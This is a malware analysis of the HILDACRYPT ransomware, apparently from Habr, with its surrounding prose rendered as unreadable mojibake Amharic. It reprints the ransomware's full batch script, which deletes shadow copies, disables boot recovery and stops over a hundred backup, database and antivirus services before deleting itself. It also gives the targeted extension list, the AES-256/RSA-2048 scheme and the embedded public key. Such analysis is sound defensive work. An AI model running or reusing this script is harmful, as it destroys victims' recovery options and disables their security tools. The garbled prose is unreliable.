á°áá áá¥á! á áᎠá áµááᣠᚠRansomware ááµá¥ áµááááµ ášá áᥠáááá¹ ášáááá áµáªá¶áœ á¥ášá°ááááá ááᢠHILDACRYPT á ááᎠ2019 ášá°ááá ášááá³ á€á°á°á¥ á á£á á¶ááµáá©á ááá°á«ášáµ á á°á ááá áµ ášNetflix á«áá±á áµá ášá°áá á á²áµ á€ááá ááᢠáᬠášáá ášá°á»á»áá ášá«áá°ááá á«áášáµ áŽááá«á á£á áªá«áµ áá á¥ášá°á°ááá á ááá¢
á ááááªá«á áš Hilda ransomware áµáªáµá£ á á©á²á©á¥ áá áá°á°áá áá á ááá
ášááááá³ááµ áµáá°á
á«áá°ááá áá€áá€áµ ááá¶ááµ á á°áá ášPE32 .NET ááá ááµá¥ ááááᢠáá á 135 á£ááµ ááᢠááá±á ááá ášáá®áá«á á®áµ á¥á ášá°ášáá«á áá®áá«á á®áµ á C # ááµá¥ á°áœáááᢠá á°á ááášá áµ áá á¥á ášá°ááµ áá á°á áá°ášáµá£ áááµá®áœ ášá°áá ášá á áŽááŽáá á 168ᣠ14 ááá¢
á¥áá° Detect It Easy áááᣠá«áá°ááá ášáááá á Confuser á¥á ConfuserExá á áá áá ááᣠááá áá á¥ááá
á áµážá«ááᜠá¥áá°á áá± á°áá³á³á áážáᣠConfuserEx á¥á» ášConfuser á°á°áª ááᣠáµááá
ášá¥áá± á®áµ ááá á°áá³á³á ááá¢
HILDACRYPT á á¥ááᥠá ConfuserEx ášá³ážá ááá¢
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
ášá¥ááµ á¬áá°á
áááá£áµáᣠá«áá°ááá á¥áá° á áá ášXAMPP áá®áá«á á ááµáá°á ášáµá áá®áá«ááá áµáš-ááŸáœ á á áá± áá á°ááá·áá¢
á á ááá ášá¢ááááœá á°áá°ááµ á ááµá¥ áá³á ááœáá
áá°á á
ášá€áááá ááá¶áœ á á°áá°á áš ááá© á°ááá ááᢠá²ááá HILDACRYPT Base64 á¥á AES-256-CBCá á áá áá á²ááªááµ á«á°ááážááá¢
á áá¥á
á ááááªá« á°ášáᣠá«áá°ááá á %AppDataRoaming% ááµá¥ ášGUID (á ááá áá áá© ááá«) áááªá« á áááá° ášááá áá áµá á áá ááá¥á«áᢠášá£áµ áááá áá°áá áŠá³ á áášá ášá«áá°ááá á«áášáµ cmd.exe á áá áá á«áµááášááá¢
cmd.exe /c JKfgkgj3hjgfhjka.bat á¥á áá£
ášáá« ášáµáááµ á£á
áªá«áµá ááá á ááááá¶áœá ááá°áášá ášá¡áµá áµááªááµ áá°áá á áááá«áá¢
áµááªáá± ášá¥á á
áááœá ášáá«á áᣠᚠSQL á ááááá ášáá«á°ááá ášá
á ášáµááá áááá áááᣠááµá¬ á¥á ážáš-á«áášáµ áááµáááœá¢
ááá³áᣠAcronis Backup á ááááá¶áœá áááá ááá¯á á áá°á³á«áᢠá á°ášááªá, ášáášá°ááµ á á á«á¢áᜠášáá á£á áá« áµááá¶áœá á¥á ášážáš-á«áášáµ áááµáááœá á«á áá-Veam, Sophos, Kaspersky, McAfee á¥á áááœ.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop âSophos Device Control Serviceâ /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop âZoolz 2 Serviceâ /y
net stop McTaskManager /y
net stop âSophos AutoUpdate Serviceâ /y
net stop âSophos System Protection Serviceâ /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop âSymantec System Recoveryâ /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop âSophos Health Serviceâ /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop âSophos Message Routerâ /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop âSophos Clean Serviceâ /y
net stop swi_update_64 /y
net stop âSophos Web Control Serviceâ /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop âVeeam Backup Catalog Data Serviceâ /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop âSophos MCS Clientâ /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop âSQLsafe Backup Serviceâ /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop âSophos Safestore Serviceâ /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop âSophos File Scanner Serviceâ /y
net stop âSophos Agentâ /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop âEnterprise Client Serviceâ /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop âSQL Backupsâ /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop âSophos MCS Agentâ /y
net stop RESvc /y
net stop âAcronis VSS Providerâ /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop âSQLsafe Filter Serviceâ /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
á áᎠášáá ášá°á áá±áµ á ááááá¶áœ á¥á áá°á¶áœ ášá°á°áášá ááªáá¶áášá ááá á áµááá á ááááá¶áœ ááášá£ážáá ááášááᥠášá°áá£á áááá áµáááá á áá áá áµá ááá á ááµ áá°á¶áœ áášá áá°á áµá£áá¢
ášá°áá£á áááá v/fo csv
áá
áµá¥áá ášá ááµ áá°á¶áœá áááá á«á³á«á, áááá¹ á "" ááááµ á°áá«áá°áá.
««csrss.exe»,«448»,«services»,«0»,«1ᅵ896 ᅵᅵ»,«unknown»,»ᅵ/ᅵ»,«0:00:03»,»ᅵ/ᅵ»»
ášáá
áŒá á ááᣠá«áá°ááá ášáááµá á áá°á±á áááá«áá¢
ááµá á«
ášááá ááµá á«
HILDACRYPT ášáªá³ááá.á¢á á¥á ášáá£áá» áµá¥á°á£áᜠášáááá®á¶ááµ áá á°á®áœ á áµá°áá á ááá ášáááµ áµá«áá ááá¶áœ ááµá¥ á«áááᢠášáááá áá³á dllᣠpdbᣠááá° ááááœá áááá¢ášá°á£á« á ááá¬áœáᜠášá€á ááá á á á«á ááá© ááœááᢠášá°áá°á á© ááááœá ááááá ášáášá°áá ášá á¥á«áᜠáááá á¥á á áá ááááá¢
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
á«áá°ááá ášá°á áá ááááœá ááááµá á AES-256-CBC áµáá° ááá áá áááᢠášááá áá á 256 á¢áµ á²áá ášááá» á¬áá°á (IV) áá á 16 á£ááµ ááá¢
á áášá°áá á
áœá á³á áᜠá¥áá³ ášá£ááµ_2 á¥á á£ááµ_1 á¥áŽá¶áœ ášá°áááµ GetBytes()á á áá áá á áááá° ááá¢
ááá
ááµá¥ á¥á
á¢áááªááµ ášá°á°ášáá ááá HCY á
á¥á« á áá!... áá
ášá°áá°á áš ááá áá³á ááᢠášáá ášá°á áá°á ááá á¥á IV ášá°áá á©áµ ááá
ááá ááá¢
ááá ááµá á«
ááªáá¶áášá ášá°áá ášáá AES ááá á á°áá°á áš ááá ááµá¥ á«ášáá»áᢠášá°áá°á ášá ááá ášááááªá« ááá á¥áá° HILDACRYPTᣠKEYᣠIVᣠFileLen á á€ááµá€áá€á á áážáµ á«á áášáááœá ášá«á á«áµá á áá á¥á áá á áááµááá¢
AES á¥á IV ááá ááµá á« ášáášáááá RSA-2048á á áá áá ááᣠá¥á á¢áá®á²áá ášáá°ášáá Base64á á áá áá ááᢠášRSA ášá
áᥠááá á á€ááµá€áá€á á
áážáµ ášá°áá°á á©áµ áá¥ášááááᜠá á áá± á ááªáá¶áášá á á«á ááµá¥ á°ášááœá·áá¢
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
áš RSA á áá£á ááá ášAES ááá áááá ááááµá á áµá« áá ááááᢠᚠRSA ášá áᥠááá Base64 á¢áá®áµ ášá°á°ášá á¥á ááá á¥á ášá áᥠá áᢠ65537 á«á«áµá³áᢠá²ááªááµ ááµášá á á¥áá á«áá RSA ášáá ááá á«áµáááááá¢
ášRSA ááµá á« á áá ášAES ááá á¢áááªááµ á á°á°ášáá ááá ááµá¥ ášá°ášááž Base64á á áá áá áá ášá°áá°á ášáá¢
ášá€á ááá¥ááµ
ááµá á«á á¥áá°á°á ááá HILDACRYPT ášá€áœá²á€áá€á áááá áá° áá«áá°á¥áá áµ á áá ááœááᢠášá«áá°ááá áá³ááá«á á°ááá á á¥ááá ááááµ ášááœáá£ážá áááµ ášá¢ááá á áµá«á»ááœá áááá¢
ášáááá«á ááµá³ááá« âáá á°á
ááá± ášá°á á á á áá°ááá€)â ášáááá ááµááá ááá - á ááá ášá³áá± áµááᜠáááášá¶áœ ááœá³ á«áážá ášá áá á¥á ášááá áá-á£á
áªá«áµ áá£áá»á¢
áá°áá°áá«
HILDACRYPTᣠá á²áµ ášá€á áá á€á°á°á¥á£ á á²áµ áµáªáµ á áá¥á·áᢠášá¢áááªááœá ááŽá á°ááá á á«áá°ááá ášá°áá°á á© ááááœá á¥áá³ááá³ áášáášááᢠááªáá¶áášá ášáá á£á áá« á²áµá°áᜠá¥á ážáš-á«áášáµ áááµááᜠáá ášá°á«á«á ášá¥á á á ááááá¶áœá ááá°áášá áá ášáášáášá« ááŽááœá áá áááᢠášHILDACRYPT á°á«á² á ááµááááµ áá ášáá³ášá ášááá³ á áááœá á°ášá³á³á á áµáá ááá£ášááá á°áá³áœ á ááá ááá°áá ášáá®áá«á áµáªáµ ášáᢠá°á¥á³á€ ááµá¥ ááááá¢
á áá°á áááµ á£
ášáµááááµ á ááá«áŸáœ
ášááá á
á¥á« HCY!
HILDAACRYPTReadMe.html
xamp.exe á á ááµ áá°á "p" á¥á ááá á²áá³á ááá ášááá¢
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
ááá: hab.com